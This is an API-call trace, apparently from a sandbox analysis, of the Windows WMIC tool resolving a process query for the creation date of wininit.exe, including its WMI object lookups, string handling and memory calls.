[0563.093] malloc (_Size=0x18) returned 0x189640
[0563.093] GetCurrentThreadId () returned 0x440
[0563.093] ??0CHString@@QEAA@XZ () returned 0xaf258
[0563.093] ??0CHString@@QEAA@PEBG@Z () returned 0xaf270
[0563.093] ??0CHString@@QEAA@AEBV0@@Z () returned 0xaf200
[0563.093] ?Empty@CHString@@QEAAXXZ () returned 0x7fef5b8c96c
[0563.093] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x18cde0
[0563.094] ?Find@CHString@@QEBAHPEBG@Z () returned 0x1b
[0563.094] ?Left@CHString@@QEBA?AV1@H@Z () returned 0xaf1c0
[0563.094] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0xaf208
[0563.094] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0xaf270
[0563.094] ??1CHString@@QEAA@XZ () returned 0x303e1201
[0563.094] ??1CHString@@QEAA@XZ () returned 0x303e1201
[0563.094] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0xaf1c8
[0563.094] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0xaf200
[0563.094] ??1CHString@@QEAA@XZ () returned 0x1
[0563.094] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x18ce40
[0563.094] ?Find@CHString@@QEBAHPEBG@Z () returned 0x7
[0563.094] ?Left@CHString@@QEBA?AV1@H@Z () returned 0xaf1c0
[0563.094] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0xaf208
[0563.094] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0xaf270
[0563.094] ??1CHString@@QEAA@XZ () returned 0x303e1201
[0563.094] ??1CHString@@QEAA@XZ () returned 0x303e1201
[0563.094] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0xaf1c8
[0563.094] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0xaf200
[0563.094] ??1CHString@@QEAA@XZ () returned 0x7fef5b8c96c
[0563.094] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x7fef5b8c960
[0563.095] ??1CHString@@QEAA@XZ () returned 0x7fef5b8c96c
[0563.095] malloc (_Size=0x18) returned 0x189660
[0563.095] malloc (_Size=0x18) returned 0x1896c0
[0563.095] malloc (_Size=0x18) returned 0x1896e0
[0563.095] malloc (_Size=0x18) returned 0x189700
[0563.095] malloc (_Size=0x18) returned 0x189720
[0563.095] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c
[0563.095] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17
[0563.095] memcpy (in: _Dst=0x311a68, _Src=0x313818, _Size=0x7a | out: _Dst=0x311a68) returned 0x311a68
[0563.095] memcpy (in: _Dst=0x311ae0, _Src=0x286718, _Size=0x30 | out: _Dst=0x311ae0) returned 0x311ae0
[0563.095] malloc (_Size=0x18) returned 0x189740
[0563.095] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53
[0563.095] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"Process\\\"") returned 0x26
[0563.095] memcpy (in: _Dst=0x348718, _Src=0x311a68, _Size=0xa8 | out: _Dst=0x348718) returned 0x348718
[0563.096] memcpy (in: _Dst=0x3487be, _Src=0x30b328, _Size=0x4e | out: _Dst=0x3487be) returned 0x3487be
[0563.096] malloc (_Size=0x18) returned 0x189760
[0563.096] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"Process\\\"") returned 0x79
[0563.096] SysStringLen (param_1="\"") returned 0x1
[0563.096] memcpy (in: _Dst=0x348828, _Src=0x348718, _Size=0xf4 | out: _Dst=0x348828) returned 0x348828
[0563.096] memcpy (in: _Dst=0x34891a, _Src=0x31edc8, _Size=0x4 | out: _Dst=0x34891a) returned 0x34891a
[0563.096] free (_Block=0x189740)
[0563.096] free (_Block=0x189720)
[0563.096] free (_Block=0x189700)
[0563.096] free (_Block=0x1896e0)
[0563.096] free (_Block=0x1896c0)
[0563.096] free (_Block=0x189660)
[0563.096] IWbemServices:GetObject (in: This=0x3089a0, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"Process\\\"\"", lFlags=0, pCtx=0x0, ppObject=0xaf248*=0x0, ppCallResult=0x0 | out: ppObject=0xaf248*=0x348be0, ppCallResult=0x0) returned 0x0
[0563.101] malloc (_Size=0x18) returned 0x189660
[0563.102] IWbemClassObject:Get (in: This=0x348be0, wszName="Text", lFlags=0, pVal=0xaf280*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffad2ac0, varVal2=0x18), pType=0x0, plFlavor=0x0 | out: pVal=0xaf280*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2fbd90*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x29e1c0, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x18), pType=0x0, plFlavor=0x0) returned 0x0
[0563.102] free (_Block=0x189660)
[0563.102] SafeArrayGetLBound (in: psa=0x2fbd90, nDim=0x1, plLbound=0xaf260 | out: plLbound=0xaf260) returned 0x0
[0563.102] SafeArrayGetUBound (in: psa=0x2fbd90, nDim=0x1, plUbound=0xaf250 | out: plUbound=0xaf250) returned 0x0
[0563.102] SafeArrayGetElement (in: psa=0x2fbd90, rgIndices=0xaf244, pv=0xaf298 | out: pv=0xaf298) returned 0x0
[0563.102] malloc (_Size=0x18) returned 0x189660
[0563.102] malloc (_Size=0x18) returned 0x1896c0
[0563.102] SysStringLen (param_1="Process management. ") returned 0x14
[0563.103] memcpy (in: _Dst=0x2f9fe8, _Src=0x2f9f98, _Size=0x2a | out: _Dst=0x2f9fe8) returned 0x2f9fe8
[0563.103] free (_Block=0x189660)
[0563.103] IUnknown:Release (This=0x348be0) returned 0x0
[0563.103] free (_Block=0x189760)
[0563.103] ??1CHString@@QEAA@XZ () returned 0x303e1201
[0563.103] ??1CHString@@QEAA@XZ () returned 0x7fef5b8c96c
[0563.103] free (_Block=0x189640)
[0563.103] ??1CHString@@QEAA@XZ () returned 0x7fef5b8c96c
[0563.103] lstrlenW (lpString="Process management. ") returned 20
[0563.104] malloc (_Size=0x2a) returned 0x188680
[0563.104] lstrlenW (lpString="Process management. ") returned 20
[0563.104] free (_Block=0x1896c0)
[0563.104] IUnknown:Release (This=0x320380) returned 0x0
[0563.104] free (_Block=0x189680)
[0563.104] ??1CHString@@QEAA@XZ () returned 0x7fef5b8c96c
[0563.104] lstrlenW (lpString="PATH") returned 4
[0563.104] lstrlenW (lpString="where") returned 5
[0563.104] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="PATH", cchCount2=4) returned 3
[0563.104] lstrlenW (lpString="WHERE") returned 5
[0563.104] lstrlenW (lpString="where") returned 5
[0563.105] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2
[0563.105] lstrlenW (lpString="/") returned 1
[0563.105] lstrlenW (lpString="name=\"wininit.exe\"") returned 18
[0563.105] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name=\"wininit.exe\"", cchCount1=18, lpString2="/", cchCount2=1) returned 3
[0563.105] lstrlenW (lpString="-") returned 1
[0563.105] lstrlenW (lpString="name=\"wininit.exe\"") returned 18
[0563.105] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name=\"wininit.exe\"", cchCount1=18, lpString2="-", cchCount2=1) returned 3
[0563.105] lstrlenW (lpString="name=\"wininit.exe\"") returned 18
[0563.105] malloc (_Size=0x26) returned 0x18cde0
[0563.105] lstrlenW (lpString="name=\"wininit.exe\"") returned 18
[0563.105] lstrlenW (lpString="/") returned 1
[0563.105] lstrlenW (lpString="get") returned 3
[0563.105] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="/", cchCount2=1) returned 3
[0563.105] lstrlenW (lpString="-") returned 1
[0563.105] lstrlenW (lpString="get") returned 3
[0563.105] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="-", cchCount2=1) returned 3
[0563.105] lstrlenW (lpString="get") returned 3
[0563.105] malloc (_Size=0x8) returned 0x18ce10
[0563.106] lstrlenW (lpString="get") returned 3
[0563.106] lstrlenW (lpString="GET") returned 3
[0563.106] lstrlenW (lpString="get") returned 3
[0563.106] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="GET", cchCount2=3) returned 2
[0563.106] lstrlenW (lpString="/") returned 1
[0563.106] lstrlenW (lpString="creationdate") returned 12
[0563.106] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="/", cchCount2=1) returned 3
[0563.106] lstrlenW (lpString="-") returned 1
[0563.106] lstrlenW (lpString="creationdate") returned 12
[0563.106] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="-", cchCount2=1) returned 3
[0563.106] lstrlenW (lpString="creationdate") returned 12
[0563.106] malloc (_Size=0x1a) returned 0x18ce30
[0563.106] lstrlenW (lpString="creationdate") returned 12
[0563.106] malloc (_Size=0x8) returned 0x18ce60
[0563.107] GetCurrentThreadId () returned 0x440
[0563.107] ??0CHString@@QEAA@XZ () returned 0xaf138
[0563.107] malloc (_Size=0x8) returned 0x18ce80
[0563.107] memmove_s (in: _Destination=0x18ce80, _DestinationSize=0x8, _Source=0x18ce60, _SourceSize=0x8 | out: _Destination=0x18ce80) returned 0x0
[0563.107] malloc (_Size=0x18) returned 0x189680
[0563.107] malloc (_Size=0x18) returned 0x1896c0
[0563.107] malloc (_Size=0x18) returned 0x189640
[0563.107] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28
[0563.107] malloc (_Size=0x3a) returned 0x18cea0
[0563.108] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="MSFT_CliAlias.FriendlyName='", cbMultiByte=-1, lpWideCharStr=0x18cea0, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29
[0563.112] free (_Block=0x18cea0)
[0563.112] malloc (_Size=0x18) returned 0x189760
[0563.112] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c
[0563.112] SysStringLen (param_1="PROCESS") returned 0x7
[0563.112] memcpy (in: _Dst=0x2d6ed8, _Src=0x348718, _Size=0x3a | out: _Dst=0x2d6ed8) returned 0x2d6ed8
[0563.112] memcpy (in: _Dst=0x2d6f10, _Src=0x31ee28, _Size=0x10 | out: _Dst=0x2d6f10) returned 0x2d6f10
[0563.112] malloc (_Size=0x18) returned 0x189660
[0563.112] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='PROCESS") returned 0x23
[0563.112] SysStringLen (param_1="'") returned 0x1
[0563.112] memcpy (in: _Dst=0x311a68, _Src=0x2d6ed8, _Size=0x48 | out: _Dst=0x311a68) returned 0x311a68
[0563.112] memcpy (in: _Dst=0x311aae, _Src=0x31edc8, _Size=0x4 | out: _Dst=0x311aae) returned 0x311aae
[0563.112] free (_Block=0x189760)
[0563.113] free (_Block=0x189640)
[0563.113] free (_Block=0x1896c0)
[0563.113] free (_Block=0x189680)
[0563.113] IWbemServices:GetObject (in: This=0x308880, strObjectPath="MSFT_CliAlias.FriendlyName='PROCESS'", lFlags=0, pCtx=0x0, ppObject=0xaf178*=0x0, ppCallResult=0x0 | out: ppObject=0xaf178*=0x320380, ppCallResult=0x0) returned 0x0
[0563.123] malloc (_Size=0x18) returned 0x189680
[0563.124] IWbemClassObject:Get (in: This=0x320380, wszName="Formats", lFlags=0, pVal=0xaf1f8*(varType=0x0, wReserved1=0x77c8, wReserved2=0x0, wReserved3=0x0, varVal1=0xffad2b80, varVal2=0xffaac79c), pType=0x0, plFlavor=0x0 | out: pVal=0xaf1f8*(varType=0x200d, wReserved1=0x77c8, wReserved2=0x0, wReserved3=0x0, varVal1=0x2fbd90*(cDims=0x1, fFeatures=0x240, cbElements=0x8, cLocks=0x0, pvData=0x2fa030, rgsabound=((cElements=0x8, lLbound=0))), varVal2=0xffaac79c), pType=0x0, plFlavor=0x0) returned 0x0
[0563.130] free (_Block=0x189680)
[0563.130] lstrlenW (lpString="SET") returned 3
[0563.131] lstrlenW (lpString="get") returned 3
[0563.131] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="SET", cchCount2=3) returned 1
[0563.131] SafeArrayGetLBound (in: psa=0x2fbd90, nDim=0x1, plLbound=0xaf190 | out: plLbound=0xaf190) returned 0x0
[0563.131] SafeArrayGetUBound (in: psa=0x2fbd90, nDim=0x1, plUbound=0xaf18c | out: plUbound=0xaf18c) returned 0x0
[0563.131] SafeArrayGetElement (in: psa=0x2fbd90, rgIndices=0xaf180, pv=0xaf168 | out: pv=0xaf168) returned 0x0
[0563.131] malloc (_Size=0x18) returned 0x189680
[0563.131] IWbemClassObject:Get (in: This=0x349b70, wszName="Name", lFlags=0, pVal=0xaf1d8*(varType=0x0, wReserved1=0xff6e, wReserved2=0x7fe, wReserved3=0x0, varVal1=0x3, varVal2=0x8), pType=0x0, plFlavor=0x0 | out: pVal=0xaf1d8*(varType=0x8, wReserved1=0xff6e, wReserved2=0x7fe, wReserved3=0x0, varVal1="STATUS", varVal2=0x8), pType=0x0, plFlavor=0x0) returned 0x0
[0563.131] free (_Block=0x189680)
[0563.131] malloc (_Size=0x18) returned 0x189680
[0563.131] lstrlenW (lpString="FULL") returned 4
[0563.131] lstrlenW (lpString="STATUS") returned 6
[0563.131] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STATUS", cchCount1=6, lpString2="FULL", cchCount2=4) returned 3
[0563.131] free (_Block=0x189680)
[0563.132] IUnknown:Release (This=0x349b70) returned 0x1
[0563.132] SafeArrayGetElement (in: psa=0x2fbd90, rgIndices=0xaf180, pv=0xaf168 | out: pv=0xaf168) returned 0x0
[0563.132] malloc (_Size=0x18) returned 0x189680
[0563.132] IWbemClassObject:Get (in: This=0x34dd70, wszName="Name", lFlags=0, pVal=0xaf1d8*(varType=0x0, wReserved1=0xff6e, wReserved2=0x7fe, wReserved3=0x0, varVal1=0x31ee88, varVal2=0x8), pType=0x0, plFlavor=0x0 | out: pVal=0xaf1d8*(varType=0x8, wReserved1=0xff6e, wReserved2=0x7fe, wReserved3=0x0, varVal1="MEMORY", varVal2=0x8), pType=0x0, plFlavor=0x0) returned 0x0
[0563.132] free (_Block=0x189680)
[0563.132] malloc (_Size=0x18) returned 0x189680
[0563.132] lstrlenW (lpString="FULL") returned 4
[0563.132] lstrlenW (lpString="MEMORY") returned 6
[0563.132] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="MEMORY", cchCount1=6, lpString2="FULL", cchCount2=4) returned 3
[0563.132] free (_Block=0x189680)
[0563.132] IUnknown:Release (This=0x34dd70) returned 0x1
[0563.132] SafeArrayGetElement (in: psa=0x2fbd90, rgIndices=0xaf180, pv=0xaf168 | out: pv=0xaf168) returned 0x0
[0563.132] malloc (_Size=0x18) returned 0x189680
[0563.133] IWbemClassObject:Get (in: This=0x357630, wszName="Name", lFlags=0, pVal=0xaf1d8*(varType=0x0, wReserved1=0xff6e, wReserved2=0x7fe, wReserved3=0x0, varVal1=0x31ee88, varVal2=0x8), pType=0x0, plFlavor=0x0 | out: pVal=0xaf1d8*(varType=0x8, wReserved1=0xff6e, wReserved2=0x7fe, wReserved3=0x0, varVal1="FULL", varVal2=0x8), pType=0x0, plFlavor=0x0) returned 0x0
[0563.133] free (_Block=0x189680)
[0563.133] malloc (_Size=0x18) returned 0x189680
[0563.133] lstrlenW (lpString="FULL") returned 4
[0563.133] lstrlenW (lpString="FULL") returned 4
[0563.133] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="FULL", cchCount1=4, lpString2="FULL", cchCount2=4) returned 2
[0563.133] free (_Block=0x189680)
[0563.133] malloc (_Size=0x18) returned 0x189680
[0563.133] IWbemClassObject:Get (in: This=0x357630, wszName="Properties", lFlags=0, pVal=0xaf210*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffad2ac0, varVal2=0x1802a8), pType=0x0, plFlavor=0x0 | out: pVal=0xaf210*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2fbf10*(cDims=0x1, fFeatures=0x240, cbElements=0x8, cLocks=0x0, pvData=0x362640, rgsabound=((cElements=0x28, lLbound=0))), varVal2=0x1802a8), pType=0x0, plFlavor=0x0) returned 0x0
[0563.137] free (_Block=0x189680)
[0563.137] SafeArrayGetLBound (in: psa=0x2fbf10, nDim=0x1, plLbound=0xaf1a0 | out: plLbound=0xaf1a0) returned 0x0
[0563.137] SafeArrayGetUBound (in: psa=0x2fbf10, nDim=0x1, plUbound=0xaf1a8 | out: plUbound=0xaf1a8) returned 0x0
[0563.137] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.137] malloc (_Size=0x18) returned 0x189680
[0563.137] IWbemClassObject:Get (in: This=0x362a00, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x0, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="CommandLine", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.137] free (_Block=0x189680)
[0563.137] malloc (_Size=0x18) returned 0x189680
[0563.137] IWbemClassObject:Get (in: This=0x362a00, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CommandLine", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.137] free (_Block=0x189680)
[0563.138] malloc (_Size=0x18) returned 0x189680
[0563.138] lstrlenW (lpString="CommandLine") returned 11
[0563.138] lstrlenW (lpString="creationdate") returned 12
[0563.138] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="CommandLine", cchCount2=11) returned 3
[0563.138] free (_Block=0x189680)
[0563.138] IUnknown:Release (This=0x362a00) returned 0x1
[0563.138] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.138] malloc (_Size=0x18) returned 0x189680
[0563.138] IWbemClassObject:Get (in: This=0x362e70, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="CommandLine", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="CSName", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.138] free (_Block=0x189680)
[0563.138] malloc (_Size=0x18) returned 0x189680
[0563.138] IWbemClassObject:Get (in: This=0x362e70, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CommandLine", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSName", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.138] free (_Block=0x189680)
[0563.139] malloc (_Size=0x18) returned 0x189680
[0563.139] lstrlenW (lpString="CSName") returned 6
[0563.139] lstrlenW (lpString="creationdate") returned 12
[0563.139] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="CSName", cchCount2=6) returned 1
[0563.139] free (_Block=0x189680)
[0563.139] IUnknown:Release (This=0x362e70) returned 0x1
[0563.139] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.139] malloc (_Size=0x18) returned 0x189680
[0563.139] IWbemClassObject:Get (in: This=0x363370, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="CSName", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="Description", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.139] free (_Block=0x189680)
[0563.139] malloc (_Size=0x18) returned 0x189680
[0563.139] IWbemClassObject:Get (in: This=0x363370, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSName", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Description", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.139] free (_Block=0x189680)
[0563.140] malloc (_Size=0x18) returned 0x189680
[0563.140] lstrlenW (lpString="Description") returned 11
[0563.140] lstrlenW (lpString="creationdate") returned 12
[0563.140] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="Description", cchCount2=11) returned 1
[0563.140] free (_Block=0x189680)
[0563.140] IUnknown:Release (This=0x363370) returned 0x1
[0563.140] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.140] malloc (_Size=0x18) returned 0x189680
[0563.140] IWbemClassObject:Get (in: This=0x363620, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="Description", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="ExecutablePath", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.140] free (_Block=0x189680)
[0563.140] malloc (_Size=0x18) returned 0x189680
[0563.140] IWbemClassObject:Get (in: This=0x363620, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Description", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ExecutablePath", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.140] free (_Block=0x189680)
[0563.140] malloc (_Size=0x18) returned 0x189680
[0563.141] lstrlenW (lpString="ExecutablePath") returned 14
[0563.141] lstrlenW (lpString="creationdate") returned 12
[0563.141] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="ExecutablePath", cchCount2=14) returned 1
[0563.141] free (_Block=0x189680)
[0563.141] IUnknown:Release (This=0x363620) returned 0x1
[0563.141] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.141] malloc (_Size=0x18) returned 0x189680
[0563.141] IWbemClassObject:Get (in: This=0x363d90, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="ExecutablePath", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="ExecutionState", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.141] free (_Block=0x189680)
[0563.141] malloc (_Size=0x18) returned 0x189680
[0563.141] IWbemClassObject:Get (in: This=0x363d90, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ExecutablePath", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ExecutionState", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.141] free (_Block=0x189680)
[0563.141] malloc (_Size=0x18) returned 0x189680
[0563.141] lstrlenW (lpString="ExecutionState") returned 14
[0563.142] lstrlenW (lpString="creationdate") returned 12
[0563.142] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="ExecutionState", cchCount2=14) returned 1
[0563.142] free (_Block=0x189680)
[0563.142] IUnknown:Release (This=0x363d90) returned 0x1
[0563.142] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.142] malloc (_Size=0x18) returned 0x189680
[0563.142] IWbemClassObject:Get (in: This=0x364280, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="ExecutionState", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="Handle", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.142] free (_Block=0x189680)
[0563.142] malloc (_Size=0x18) returned 0x189680
[0563.142] IWbemClassObject:Get (in: This=0x364280, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ExecutionState", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Handle", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.142] free (_Block=0x189680)
[0563.142] malloc (_Size=0x18) returned 0x189680
[0563.142] lstrlenW (lpString="Handle") returned 6
[0563.143] lstrlenW (lpString="creationdate") returned 12
[0563.143] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="Handle", cchCount2=6) returned 1
[0563.143] free (_Block=0x189680)
[0563.143] IUnknown:Release (This=0x364280) returned 0x1
[0563.143] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.143] malloc (_Size=0x18) returned 0x189680
[0563.143] IWbemClassObject:Get (in: This=0x3648c0, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="Handle", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="HandleCount", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.143] free (_Block=0x189680)
[0563.143] malloc (_Size=0x18) returned 0x189680
[0563.143] IWbemClassObject:Get (in: This=0x3648c0, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Handle", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HandleCount", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.143] free (_Block=0x189680)
[0563.143] malloc (_Size=0x18) returned 0x189680
[0563.143] lstrlenW (lpString="HandleCount") returned 11
[0563.144] lstrlenW (lpString="creationdate") returned 12
[0563.144] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="HandleCount", cchCount2=11) returned 1
[0563.144] free (_Block=0x189680)
[0563.144] IUnknown:Release (This=0x3648c0) returned 0x1
[0563.144] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.144] malloc (_Size=0x18) returned 0x189680
[0563.144] IWbemClassObject:Get (in: This=0x364e10, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="HandleCount", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="InstallDate", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.144] free (_Block=0x189680)
[0563.144] malloc (_Size=0x18) returned 0x189680
